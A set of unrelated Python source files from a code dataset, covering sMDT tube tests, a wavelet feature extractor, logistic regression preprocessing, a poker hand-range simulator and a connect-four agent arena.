main(cmd_args)\n","sub_path":"scripts/update_dreqs/update_dreqs_0163.py","file_name":"update_dreqs_0163.py","file_ext":"py","file_size_in_byte":12384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"84804015","text":"###############################################################################\n# File: test_outer.py\n# Author(s): Paul Johnecheck\n# Date Created: 02 May, 2021\n#\n# Purpose: This file is the home of the test cases \n# that will import the library just like a user/application will.\n#\n# Known Issues:\n#\n# Workarounds:\n#\n###############################################################################\n\ndef test_outer():\n '''\n This test is the simplest use case of the library, and is the example in README.md\n '''\n from sMDT import db,tube\n from sMDT.data import tension\n tubes = db.db()\n tube1 = tube.Tube()\n tube1.tension.add_record(tension.TensionRecord(1.5))\n assert tube1.tension.get_record().tension == 1.5\n\ndef highest(tension_station):\n max_tension = 0\n max_record = None\n for record in tension_station.m_records:\n if record.tension > max_tension:\n max_tension = record.tension\n max_record = record\n return max_record\n\ndef test_user_defined_mode():\n '''\n This test tests the mode system of the station class, and will make a new mode called highest above and test it.\n '''\n from sMDT import tube\n from sMDT.data import station,tension\n tube1 = tube.Tube()\n tube1.tension.add_record(tension.TensionRecord(350))\n tube1.tension.add_record(tension.TensionRecord(370))\n tube1.tension.add_record(tension.TensionRecord(330))\n assert tube1.tension.get_record(highest).tension == 370\n\ndef test_outer_modes():\n '''\n This test tests the mode system of the station class, tests records, built-in modes, and user-defined modes.\n '''\n from sMDT.data import tension,station\n t = tension.Tension()\n t.add_record(tension.TensionRecord(350))\n t.add_record(tension.TensionRecord(330))\n t.add_record(tension.TensionRecord(370))\n t.add_record(tension.TensionRecord(349))\n t.add_record(tension.TensionRecord(351))\n first = t.get_record(mode='first')\n assert first.tension == 350\n assert not first.fail()\n assert not t.fail(mode='first')\n assert t.fail(lambda x: max(x.m_records, key=lambda y: y.tension))\n\ndef test_outer_swage():\n '''\n This test tests the outer library-call use of the swage station.\n '''\n from sMDT.data import swage\n swage_station = swage.Swage() #instantiate swage station object\n swage_station.add_record(swage.SwageRecord(raw_length=3.4, swage_length=3.2))#add 3 SwageRecords to the swage station\n swage_station.add_record(swage.SwageRecord(raw_length=5.2, swage_length=8))\n swage_station.add_record(swage.SwageRecord(raw_length=1.03, swage_length=5))\n assert swage_station.get_record(\"first\").raw_length == 3.4 #print the first SwageRecord\n assert not swage_station.fail(\"last\") #print wether the tube fails based on the last record.\n\n\ndef test_outer_tension():\n '''\n This test tests the outer library-call use of the tension station.\n '''\n from sMDT.data import tension\n tension_station = tension.Tension() #instantiate tension station object\n tension_station.add_record(tension.TensionRecord(tension=350, frequency=3.2)) #add 3 TensionRecords to the tension station, nonsense values for frequency\n tension_station.add_record(tension.TensionRecord(tension=345, frequency=8))\n tension_station.add_record(tension.TensionRecord(tension=370, frequency=5))\n assert tension_station.get_record(\"first\").tension == 350 #print the first SwageRecord\n assert tension_station.fail(\"last\") #print the first TensionRecord, and whether the tube fails based on the last record.\n\ndef test_outer_leak():\n '''\n This test tests the outer library-call use of the leak station.\n '''\n from sMDT.data import leak\n leak_station = leak.Leak() #instantiate leak station object\n leak_station.add_record(leak.LeakRecord(leak_rate=0)) #add 3 LeakRecords to the leak station, nonsense values for frequency\n leak_station.add_record(leak.LeakRecord(leak_rate=5))\n leak_station.add_record(leak.LeakRecord(leak_rate=0.00000000001))\n assert leak_station.get_record(\"first\").leak_rate == 0 #print the first SwageRecord\n assert not leak_station.fail(\"last\") #print the first LeakRecord, and whether the tube fails based on the last record.\n\ndef test_outer_darkcurrent():\n '''\n This test tests the outer library-call use of the dark current station.\n '''\n from sMDT.data import dark_current\n darkcurrent_station = dark_current.DarkCurrent() #instantiate darkcurrent station object\n darkcurrent_station.add_record(dark_current.DarkCurrentRecord(3)) #add 3 DarkCurrentRecords to the darkcurrent station, nonsense values for frequency\n darkcurrent_station.add_record(dark_current.DarkCurrentRecord(1e-10))\n darkcurrent_station.add_record(dark_current.DarkCurrentRecord(0))\n assert darkcurrent_station.get_record(\"first\").dark_current == 3 #print the first SwageRecord\n assert not darkcurrent_station.fail(\"last\") #print the first DarkCurrentRecord, and whether the tube fails based on the last record.\n\n\ndef test_comprehensive():\n '''\n This comprehensive tests tests several things also tested by other tests, but this brings it together and does it with many tubes/records\n '''\n\n from sMDT import db,tube\n from sMDT.data import tension\n tubes = db.db()\n dbman = db.db_manager()\n \n id = \"MSU00000\"\n for i in range(50):\n tube1 = tube.Tube()\n for j in range(i+1):\n tube1.tension.add_record(tension.TensionRecord(j))\n tube1.m_tube_id = id + str(i)\n tubes.add_tube(tube1)\n\n dbman.update()\n\n assert tubes.get_tube(id + str(0)).tension.get_record('first').tension == 0\n assert tubes.get_tube(id + str(49)).tension.get_record('last').tension == 49\n\n del tubes\n tubes = db.db()\n assert tubes.get_tube(id + str(0)).tension.get_record('first').tension == 0\n assert tubes.get_tube(id + str(49)).tension.get_record('last').tension == 49\n\ndef test_db_simple():\n from sMDT import db,tube\n from sMDT.data import tension\n tubes = db.db()\n dbman = db.db_manager()\n dbman.wipe('confirm')\n tube1 = tube.Tube()\n id = \"MSU000001\"\n tube1.m_tube_id = id\n tube1.tension.add_record(tension.TensionRecord(1.5))\n\n tubes.add_tube(tube1)\n\n dbman.update()\n\n assert tubes.get_tube(id).tension.get_record('first').tension == 1.5\n","sub_path":"test_outer.py","file_name":"test_outer.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445225636","text":"#!/usr/bin/env python\n\nimport logging\nimport output\nimport configuration\nimport iomap\n\noutputs = {}\noutputs_per_id = {}\n\ndef init():\n logging.debug(\"Outputs init\")\n\n for o in configuration.defined_outputs:\n oobj = output.output(o['name'], o['service'], o['id'])\n outputs_per_id[(o['service'], o['id'])] = oobj\n outputs[o['name']] = oobj\n iomap.Iomap[o['name']] = oobj\n\ndef on_state_change(name, id, state, value):\n #logging.debug(\"Output %s %d state change\", name, id)\n\n if (name, id) not in outputs_per_id:\n #logging.debug(\"Output not known, creating\")\n o = output.output(name + \"_\" + str(id), name, id)\n outputs_per_id[(name, id)] = o\n outputs[o.name] = o\n iomap.Iomap[o.name] = o\n o.on_state_change(state, value)\n else:\n #logging.debug(\"Output known\")\n outputs_per_id[(name, id)].on_state_change(state, value)\n","sub_path":"io-control/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"200309661","text":"import pywt\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport gc\n\nclass WaveletTransform(nn.Module):\n \"\"\"Some Information about WaveletTransform\"\"\"\n def __init__(self,channel):\n super(WaveletTransform, self).__init__()\n self.level1_conv1x1 = self.conv1x1(channel[0])\n self.level2_conv1x1 = self.conv1x1(channel[1],level=2)\n self.level3_conv1x1 = self.conv1x1(channel[2],level=3)\n self.conv = nn.Conv2d(3,32,kernel_size=3,stride=2,padding=1)\n self.avg_pool = nn.AvgPool2d(kernel_size=2,stride=2)\n self.conv1x = nn.Conv2d(32,64,kernel_size=1)\n self.bn_orig64 = nn.BatchNorm2d(64)\n self.bn_orig32 = nn.BatchNorm2d(32)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = x.to(device=\"cpu\")\n orig_input = x\n x_l1=x_l2=x_l3=0\n \n with torch.no_grad():\n # decomposition 1\n coeffs = pywt.dwt2(x,'haar')\n LL, (LH, HL, HH) = coeffs\n LL,LH,HL,HH = torch.tensor(LL),torch.tensor(LH),torch.tensor(HL),torch.tensor(HH)\n x_l1 = torch.cat([LL,LH,HL,HH],1)\n #print(f'Decomposition 1 shape: {x_l1.shape}')\n \n del LL,LH,HL,HH,coeffs\n gc.collect()\n \n # decomposition 2\n coeffs = pywt.dwt2(x_l1,'haar')\n LL1, (LH1, HL1, HH1) = coeffs\n LL1,LH1,HL1,HH1 = torch.tensor(LL1),torch.tensor(LH1),torch.tensor(HL1),torch.tensor(HH1)\n x_l2 = torch.cat([LL1,LH1,HL1,HH1],1)\n #print(f'Decomposition 2 shape: {x_l2.shape}')\n \n del LL1,LH1,HL1,HH1,coeffs\n gc.collect()\n \n # decomposition 3\n coeffs = pywt.dwt2(x_l2,'haar')\n LL2, (LH2, HL2, HH2) = coeffs\n LL2, LH2, HL2, HH2 = torch.tensor(LL2),torch.tensor(LH2),torch.tensor(HL2),torch.tensor(HH2)\n x_l3 = torch.cat([LL2,LH2,HL2,HH2],1)\n #print(f'Decomposition 3 shape: {x_l3.shape}')\n \n #orig_input = orig_input.type(torch.float32)\n #x_l1 = x_l1.to(device=\"cuda\",dtype=torch.cuda.FloatTensor)\n #x_l2 = x_l2.to(device=\"cuda\",dtype=torch.cuda.FloatTensor)\n #x_l3 = x_l3.to(device=\"cuda\",dtype=torch.cuda.FloatTensor)\n \n # convolution operations\n #orig_input = orig_input.detach().clone().requires_grad(True)\n orig_input = orig_input.type(torch.float32)\n orig_input = torch.tensor(orig_input,device=\"cuda\",requires_grad=True)\n input_level1 = x_l1.detach().clone().requires_grad_(True)\n input_level1 = input_level1.to(device=\"cuda\",dtype=torch.float32)\n #input_level1 = input_level1.type()\n input_level2 = x_l2.detach().clone().requires_grad_(True)\n input_level2 = input_level2.to(device=\"cuda\",dtype=torch.float32)\n #input_level2 = input_level2.type(torch.float16)\n input_level3 = x_l3.detach().clone().requires_grad_(True)\n input_level3 = input_level3.to(device=\"cuda\",dtype=torch.float32)\n #input_level3.requires_grad(True)\n #input_level3 = input_level3.type(torch.float16).to(device=\"cuda\")\n \n del x_l2, x_l3, x_l1\n gc.collect()\n torch.cuda.empty_cache() \n \n orig_input = self.conv(orig_input)\n orig_input = self.relu(self.bn_orig32(self.avg_pool(orig_input)))\n orig_input = self.relu(self.bn_orig64(self.conv1x(orig_input)))\n level1 = self.level1_conv1x1(input_level1)\n level2 = self.level2_conv1x1(input_level2)\n level3 = self.level3_conv1x1(input_level3)\n \n '''\n print(f'Original data type: {x_l1.dtype}')\n print(f'x_l1 data type: {x_l1.dtype}')\n print(f'x_l2 data type: {x_l2.dtype}')\n print(f'x_l3 data type: {x_l3.dtype}')\n print(f'Original input shape after convolution: {orig_input.shape}')\n print(f'Level shape after convolution: {level1.shape}')\n print(f'Level2 shape after convolution: {level2.shape}')\n print(f'Level3 shape after convolution: {level3.shape}')\n '''\n return orig_input,level1,level2,level3\n\n def conv1x1(self,channels,level=1):\n net = \"\"\n if level==1:\n net = nn.Sequential(\n nn.Conv2d(channels[0],channels[1],kernel_size=1),\n nn.AvgPool2d(kernel_size=2,stride=2),\n nn.BatchNorm2d(channels[1]),\n nn.ReLU()\n )\n else:\n net = nn.Sequential(\n nn.Conv2d(channels,channels,kernel_size=1),\n nn.BatchNorm2d(channels),\n nn.ReLU())\n return net\n \nif __name__ == '__main__':\n x = torch.rand((8,3,224,224))\n channel = [[12,32],48,192]\n wl = WaveletTransform(channel).to(device=\"cuda\")\n o,l1,l2,l3 = wl(x)","sub_path":"src/wavelet-FE/wavelet_feature_ex.py","file_name":"wavelet_feature_ex.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"438011040","text":"fin = open('bin.txt', 'r')\nfout = open('bout.txt', 'w')\n\nT = int(fin.readline())\n\ndef solve():\n s = fin.readline().split()[0]\n a = s[0]\n curr = a\n count = 1\n\n for c in s:\n if c != curr:\n count += 1\n curr = c\n ans = count - 1\n if a == \"-\" and count % 2 == 1:\n ans += 1\n if a == \"+\" and count % 2 == 0:\n ans += 1\n #print(a, count, ans)\n return ans\n\nfor i in range(T):\n fout.write(\"Case #\" + str(i+1) + \": \" + str(solve()) + \"\\n\")\n\nfin.close()\nfout.close()\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_raynboz_b.py","file_name":"16_0_2_raynboz_b.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"404513609","text":"from helios.utils.async_dispatch import (\n async_method,\n)\n\n\nclass AsyncChainMixin:\n\n coro_get_canonical_block_by_number = async_method('get_canonical_block_by_number')\n coro_get_block_by_hash = async_method('get_block_by_hash')\n coro_get_block_by_header = async_method('get_block_by_header')\n\n coro_import_block = async_method('import_block')\n coro_import_chain = async_method('import_chain')\n coro_get_block_stake_from_children = async_method('get_block_stake_from_children')\n coro_get_mature_stake = async_method('get_mature_stake')\n coro_get_all_chronological_blocks_for_window = async_method('get_all_chronological_blocks_for_window')\n coro_import_chronological_block_window = async_method('import_chronological_block_window')\n coro_update_current_network_tpc_capability = async_method('update_current_network_tpc_capability')\n coro_get_local_tpc_cap = async_method('get_local_tpc_cap')\n coro_re_initialize_historical_minimum_gas_price_at_genesis = async_method(\n 're_initialize_historical_minimum_gas_price_at_genesis')\n\n\n","sub_path":"helios/chains/coro.py","file_name":"coro.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243433933","text":"'''\nPreprocess and split the data, compute x_opt and f_opt\n'''\n\nimport numpy as np\nimport argparse\nimport pickle\nfrom datasets.utils import get_dataset\nimport numpy.linalg as la\nfrom config import data_path, is_normalized, l2_weights, is_convex, shuffle\nfrom loss_functions import LogisticRegression\nfrom sklearn.preprocessing import normalize\nimport os\n\nparser = argparse.ArgumentParser(description='Preprocessing for the dataset')\nparser.add_argument('--data', action='store', dest='dataset', type=str, help='Which dataset?')\nparser.add_argument('--cond', action='store', dest='cond', type=float, help='Condition of halting, grad norm sqr < ?')\nparser.add_argument('--it_max', action='store', dest='it_max', type=int, help='Max iteration')\nparser.add_argument('--n', action='store', dest='n_workers', type=int, help='Number of local workers')\n\nargs = parser.parse_args()\ndataset = args.dataset\nn_workers = args.n_workers\nit_max = args.it_max\ncond = args.cond\n\nl2 = l2_weights[dataset]\nif is_convex:\n l2 = 0\n\nA, b = get_dataset(dataset, data_path)\nprint(\"===Data has been loaded===\")\nif is_normalized:\n A = normalize(A)\n\nif shuffle:\n idx = np.arange(len(b))\n np.random.shuffle(idx)\n A = A[idx]\n b = b[idx]\n\nN, d = A.shape\nm = N // n_workers\nA = A[:(m*n_workers)]\nb = b[:(m*n_workers)]\nN, _ = A.shape\nx0 = np.zeros((d,))\nloss_function = LogisticRegression(A, b, l2=l2)\nL = loss_function.smoothness()\n\n\ngrad_norm_sq = la.norm(loss_function.gradient(x0))\nx = np.copy(x0)\nprint('f_0: {0}'.format(loss_function.value(x)))\n\nk = 0\nwhile grad_norm_sq >= cond and k <= it_max:\n\n grad = loss_function.gradient(x)\n grad_norm_sq = loss_function.norm(grad) ** 2\n x = x - (1 / L) * grad\n\n if k % 50 == 0:\n print(grad_norm_sq)\n\n k += 1\n\nx_opt = x.copy()\nf_opt = loss_function.value(x_opt)\n\ndata_info = {'x_opt': x_opt, 'f_opt': f_opt, 'L': L}\nif is_convex:\n cvx = 'cvx'\nelse:\n cvx = 'scvx'\ndataset_name = '{0}-{1}-{2}'.format(dataset, cvx, n_workers)\ndata_set_path = '{0}{1}/'.format(data_path, dataset_name)\nif not os.path.exists(data_set_path):\n os.makedirs(data_set_path)\nfile_name = '{0}{1}-{2}-{3}-{4}_info.p'.format(data_set_path, dataset, cond, it_max, l2)\npickle.dump(data_info, open(file_name, \"wb\"))\n\n# Splitting the data\nf_i = 0\nfor i in range(n_workers):\n Ai = A[(i * m):(i + 1) * m]\n bi = b[(i * m):(i + 1) * m]\n data_info = {'Ai': Ai, 'bi': bi}\n local_data_path = '{0}{1}/'.format(data_set_path, str(i))\n if not os.path.exists(local_data_path):\n os.makedirs(local_data_path)\n pickle.dump(Ai, open(local_data_path + 'A.p', \"wb\"))\n pickle.dump(bi, open(local_data_path + 'b.p', \"wb\"))\n\nprint(\"===Preprocessing is finished===\")\n","sub_path":"logistic_regression/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54402388","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef plot_hyperparams_over_search(df, hyperparams):\n \"\"\"Function to plot the value of hyperparameters over the tuning window\n\n Parameters\n ----------\n df : pandas.DataFrame\n DataFrame containing the hyperparameter search results\n hyperparams : list\n list of hyperparameters used for tuning\n\n Returns\n -------\n sns.regplot object\n\n \"\"\"\n\n hyperparams = hyperparams\n fig, axs = plt.subplots(1, len(hyperparams), figsize=(24, 6))\n i = 0\n\n if len(hyperparams) > 1:\n for i, hyper in enumerate(hyperparams):\n sns.regplot(\"iteration\", hyper, data=df, ax=axs[i])\n axs[i].set(\n xlabel=\"Iteration\",\n ylabel=\"{}\".format(hyper),\n title=\"{} over Search\".format(hyper),\n )\n\n else:\n sns.regplot(\"iteration\", hyperparams[0], data=df)\n axs.set(\n xlabel=\"Iteration\",\n ylabel=\"{}\".format(hyperparams[0]),\n title=\"{} over Search\".format(hyperparams[0]),\n )\n\n return plt.tight_layout()\n\n\ndef plot_search_dist(df, hyperparams):\n \"\"\"Function to create a kde plot of hyperparameters used over the tuning window\n\n Parameters\n ----------\n df : pandas.DataFrame\n DataFrame containing the hyperparameter search results\n hyperparams : list\n list of hyperparameters used for tuning\n\n Returns\n -------\n sns.kdeplot object\n\n \"\"\"\n\n hyperparams = hyperparams\n fig, axs = plt.subplots(1, len(hyperparams), figsize=(24, 6))\n i = 0\n\n if len(hyperparams) > 1:\n for i, hyper in enumerate(hyperparams):\n sns.kdeplot(df[hyperparams[i]], linewidth=2, ax=axs[i])\n axs[i].set(\n xlabel=hyperparams[i],\n ylabel=\"Density\",\n title=\"{} Search Distribution\".format(hyperparams[i]),\n )\n\n else:\n sns.kdeplot(df[hyperparams[0]], linewidth=2)\n axs.set(\n xlabel=hyperparams[i],\n ylabel=\"Density\",\n title=\"{} Search Distribution\".format(hyperparams[i]),\n )\n\n return plt.tight_layout()","sub_path":"Grocery_Recommender/Model_Build/plot_hyperparameter_tuning.py","file_name":"plot_hyperparameter_tuning.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377460235","text":"# -*- coding=utf-8 -*-\n\nfrom mongo import mongo\nimport random\nfrom model.card import Card, HandsCard\nimport hands_range\nfrom model.board import ResultStatis\nimport time\n\n\ndef insertDataList(db, dataList):\n ratedb = db\n # print(dataList)\n for data in dataList:\n r = ratedb.find_one({\n 'hands': data['hands']\n })\n if not r:\n for i in range(0, 10):\n data['winRate' + str(i)] = data['winNum' + str(i)] / data['totalNum' + str(i)]\n ratedb.insert_one(data)\n else:\n data['totalNum'] += r['totalNum']\n data['winNum'] += r['winNum']\n for i in range(0, 10):\n data['winNum' + str(i)] += r['winNum' + str(i)]\n data['totalNum' + str(i)] += r['totalNum' + str(i)]\n data['winRate' + str(i)] = data['winNum' + str(i)] / data['totalNum' + str(i)]\n ratedb.replace_one({'hands': data['hands']}, data, True)\n\n\ndef insertMapData(db, dataMap):\n for key in dataMap.keys():\n r = db.find_one({\n 'hands': key.simple_string(),\n })\n data = dataMap[key]\n if not r:\n for i in range(0, 10):\n data['rate' + str(i)] = data['num' + str(i)] / data['totalNum']\n if data['num' + str(i)] != 0:\n data['winRate' + str(i)] = data['winNum' + str(i)] / data['num' + str(i)]\n db.insert_one(data)\n else:\n data['totalNum'] += r['totalNum']\n data['winNum'] += r['winNum']\n data['winRate'] = data['winNum'] / data['totalNum']\n for i in range(0, 10):\n data['winNum' + str(i)] += r['winNum' + str(i)]\n data['num' + str(i)] += r['num' + str(i)]\n data['rate' + str(i)] = data['num' + str(i)] / data['totalNum']\n if data['num' + str(i)] != 0:\n data['winRate' + str(i)] = data['winNum' + str(i)] / data['num' + str(i)]\n db.replace_one({'hands': key.simple_string()}, data, True)\n\n\ndef updateHandsWinNumForRange(handsList, playerNum, db, totalNum=1000, toDealNum=5):\n realRange = hands_range.expandRangeToReal(handsList)\n\n for i in range(0, 100):\n handsList = []\n cards = set()\n dataList = []\n for n in range(0, playerNum):\n hands = None\n while hands == None or hands[0] in cards or hands[1] in cards:\n hands = HandsCard.from_string(random.choice(realRange))\n cards.add(hands[0])\n cards.add(hands[1])\n handsList.append(hands)\n\n res = ResultStatis.fromHandsAndGenerateResultMap(handsList, totalNum=1000)\n\n insertMapData(db, res)\n\n\ndef topHandsResult(k=0.25):\n if type(k) == float:\n k = int(169 * k)\n ratedb = mongo.generateDB(rangee='169')\n res = ratedb.find({}).sort([('winRate', -1)])\n handsResult = set()\n for i in range(0, k):\n hands = Card.array_from_string(res[i]['hands'])\n handsResult.add(hands)\n if __name__ == '__main__':\n print(res[i]['hands'], end=' ')\n return handsResult\n\n\ndef autoReduceRange(cur=170, step=5, limit=300000, target=50, postfix=''):\n ls2 = hands_range.getRangeHands(cur)\n while True:\n db = mongo.generateDB(rangee=str(cur))\n r = db.find_one({'hands': 'AA'})\n if r and r['totalNum'] >= limit:\n ls2 = hands_range.reduceHands(cur)\n cur -= step\n continue\n updateHandsWinNumForRange(ls2, db)\n\n\ndef updateResultStatisData(handsRange=170, playerNum=2, step=5, limit=1000000, target=80, postfix='NoneHigh',toDealNum=5):\n ls = hands_range.getRangeHands(handsRange)\n t1 = time.time()\n while handsRange >= target:\n db = mongo.generateDB(playerNum=playerNum, rangee=str(handsRange), postfix=postfix)\n r = db.find_one({'hands': 'AA'})\n if r and r['totalNum'] >= limit:\n ls = hands_range.reduceHands(handsRange, postfix=postfix)\n handsRange -= step\n continue\n print('%.1f' % (time.time() - t1), len(ls))\n t1 = time.time()\n updateHandsWinNumForRange(ls, playerNum, db)\n\n\ndef profileTest(handsRange=170, playerNum=2, step=5, limit=1000000, target=80, postfix='NoneHigh'):\n ls = hands_range.getRangeHands(handsRange)\n db = mongo.generateDB(playerNum=playerNum, rangee=str(handsRange), postfix=postfix)\n\n updateHandsWinNumForRange(ls, playerNum, db, toDealNum=toDealNum)\n\n\ndef main():\n # updateResultStatisData(playerNum=4,limit=300000)\n # cProfile.run('profileTest()')\n updateResultStatisData(playerNum=4, toDealNum=4,limit=300000)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559909623","text":"import string\n\ndef is_isogram(s):\n alpha = string.ascii_lowercase\n s = s.lower()\n l = list(s.replace('-', '').replace(' ', ''))\n print(l)\n if len(set(l)) == len(l):\n return True\n else:\n return False\n","sub_path":"isogram.py","file_name":"isogram.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"474629332","text":"class ConnectionFactory(object):\n\n TYPE_VIYA = 'Viya'\n TYPE_WAREHOUSE = 'Warehouse'\n TYPE_MYSQL = 'MySql'\n\n @staticmethod\n def get_connection(connection):\n class_string = '%sConnection' % str(connection)\n module_obj = __import__('Connections.%s' % class_string)\n\n if hasattr(module_obj, class_string):\n class_obj = getattr(module_obj, class_string)\n return class_obj()\n else:\n raise Exception('CONNECTION: Requested Connection Type Not Found')\n\n def set_connection(self, *argv):\n conns = dict()\n for arg in argv:\n conns.__setitem__(arg, self.get_connection(arg))\n return conns\n","sub_path":"Connections/ConnectionFactory.py","file_name":"ConnectionFactory.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"623666338","text":"import copy\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport connect_four_3d as games\n\n\n\nclass vs:\n def __init__(self, agent_1, agent_2):\n self.game = games.ConnectFour()\n self.agent_1 = agent_1\n self.agent_2 = agent_2\n self.elo = False\n self.k = 32\n self.a1_elo = None\n self.a1_elo_hist = []\n self.a2_elo = None\n self.a2_elo_hist = []\n self.a1_win = []\n self.a1_avg_win = []\n self.a1_player = []\n self.a2_win = []\n self.a2_avg_win = []\n self.a2_player = []\n self.history = []\n\n def add_elo(self, R1, R2):\n \"\"\"Adds a specified elo rating for agent_1 and agent_2\"\"\"\n self.elo = True\n self.a1_elo = R1\n self.a2_elo = R2\n self.a1_elo_hist = [self.a1_elo]\n self.a2_elo_hist = [self.a2_elo]\n\n def move(self, game, action):\n \"\"\"Performs for selected action for the player whose turn it is\"\"\"\n if game.p1_turn:\n game.player_1(action)\n elif game.p2_turn:\n game.player_2(action)\n\n def play(self, episodes):\n \"\"\"\n Initialises and plays through one episode of connect four with the two \n agents competing in their randomly selected positions\n \"\"\"\n self.a1_win = []\n self.a1_avg_win = []\n self.a1_player = []\n self.a2_win = []\n self.a2_avg_win = []\n self.a2_player = []\n self.history = []\n\n for i in range(episodes):\n self.game.start()\n self.history = []\n self.agent_1.interface_init(copy.deepcopy(self.game))\n self.agent_2.interface_init(copy.deepcopy(self.game))\n a1 = np.random.choice((True, False))\n a1_p1 = copy.deepcopy(a1)\n if a1_p1:\n self.a1_player.append(1)\n self.a2_player.append(2)\n else:\n self.a1_player.append(2)\n self.a2_player.append(1)\n\n while self.game.active: \n if a1:\n action_1 = self.agent_1.interface_turn()\n self.agent_2.interface_update(action_1)\n\n self.move(self.game, action_1)\n\n self.history.append(copy.deepcopy(self.game.grid))\n a1 = False\n else:\n action_2 = self.agent_2.interface_turn()\n self.agent_1.interface_update(action_2)\n\n self.move(self.game, action_2)\n\n self.history.append(copy.deepcopy(self.game.grid))\n a1 = True\n\n if self.game.p1_win:\n if a1_p1:\n self.a1_win.append(1)\n self.a2_win.append(-1)\n self.elo_update(1, 0)\n elif not a1_p1:\n self.a1_win.append(-1)\n self.a2_win.append(1)\n self.elo_update(0, 1)\n elif self.game.p2_win:\n if a1_p1:\n self.a1_win.append(-1)\n self.a2_win.append(1)\n self.elo_update(0, 1)\n elif not a1_p1:\n self.a1_win.append(1)\n self.a2_win.append(-1)\n self.elo_update(1, 0)\n elif self.game.draw:\n self.elo_update(0.5, 0.5)\n self.a1_win.append(0)\n self.a2_win.append(0)\n\n self.a1_avg_win.append(np.sum(self.a1_win) / len(self.a1_win))\n self.a2_avg_win.append(np.sum(self.a2_win) / len(self.a2_win))\n if (i + 1) / episodes * 100 % 1 < np.finfo(float).eps:\n print('%', int((i + 1) / episodes * 100))\n\n def elo_update(self, points_1, points_2):\n \"\"\"Updated the elo ratings of the competing agents\"\"\"\n if self.elo:\n E1 = 1 / (1 + 10**((self.a2_elo - self.a1_elo) / 400))\n E2 = 1 / (1 + 10**((self.a1_elo - self.a2_elo) / 400))\n R1_new = self.a1_elo + self.k * (points_1 - E1)\n R2_new = self.a2_elo + self.k * (points_2 - E2)\n self.a1_elo = R1_new\n self.a2_elo = R2_new\n #R2_new = self.a2_elo\n self.a1_elo_hist.append(R1_new)\n self.a2_elo_hist.append(R2_new)\n\n def mover_stat(self):\n \"\"\"Displays statistics about win/loss/draws depending on first or second player\"\"\"\n a1_first, a1_second = 0, 0\n a2_first, a2_second = 0, 0\n a1_first_win, a1_first_draw, a1_first_loss = 0, 0, 0\n a2_first_win, a2_first_draw, a2_first_loss = 0, 0, 0\n a1_second_win, a1_second_draw, a1_second_loss = 0, 0, 0\n a2_second_win, a2_second_draw, a2_second_loss = 0, 0, 0\n\n for i in range(len(self.a1_player)):\n if self.a1_player[i] == 1:\n a1_first += 1\n a2_second += 1\n if self.a1_win[i] == 1:\n a1_first_win += 1\n a2_second_loss += 1\n elif self.a1_win[i] == -1:\n a1_first_loss += 1\n a2_second_win += 1\n elif self.a1_win[i] == 0:\n a1_first_draw += 1\n a2_second_draw += 1\n elif self.a1_player[i] == 2:\n a1_second += 1\n a2_first += 1\n if self.a1_win[i] == 1:\n a1_second_win += 1\n a2_first_loss += 1\n elif self.a1_win[i] == -1:\n a1_second_loss += 1\n a2_first_win += 1\n elif self.a1_win[i] == 0:\n a1_second_draw += 1\n a2_first_draw += 1\n \n print('Agent 1 P1 rounds:', a1_first, 'as P2:', a1_second)\n print('Agent 2 p1 rounds:', a2_first, 'as P2:', a2_second)\n print(' ')\n print('Agent 1 total - win:', np.round((a1_first_win + a1_second_win) / (a1_first + a1_second), 5), \n 'draw:', np.round((a1_first_draw + a1_second_draw) / (a1_first + a1_second), 5), \n 'loss:', np.round((a1_first_loss + a1_second_loss) / (a1_first + a1_second), 5))\n print('Agent 2 total - win:', np.round((a2_first_win + a2_second_win) / (a2_first + a2_second), 5), \n 'draw:', np.round((a2_first_draw + a2_second_draw) / (a2_first + a2_second), 5), \n 'loss:', np.round((a2_first_loss + a2_second_loss) / (a2_first + a2_second), 5))\n print(' ')\n print('Agent 1 as P1 - win:', np.round(a1_first_win / a1_first, 5), \n 'draw:', np.round(a1_first_draw / a1_first, 5), \n 'loss:', np.round(a1_first_loss / a1_first, 5))\n print('Agent 1 as P2 - win:', np.round(a1_second_win / a1_second, 5), \n 'draw:', np.round(a1_second_draw / a1_second, 5), \n 'loss:', np.round(a1_second_loss / a1_second, 5))\n print(' ')\n print('Agent 2 as P1 - win:', np.round(a2_first_win / a2_first, 5), \n 'draw:', np.round(a2_first_draw / a2_first, 5), \n 'loss:', np.round(a2_first_loss / a2_first, 5))\n print('Agent 2 as P2 - win:', np.round(a2_second_win / a2_second, 5), \n 'draw:', np.round(a2_second_draw / a2_second, 5), \n 'loss:', np.round(a2_second_loss / a2_second, 5))\n 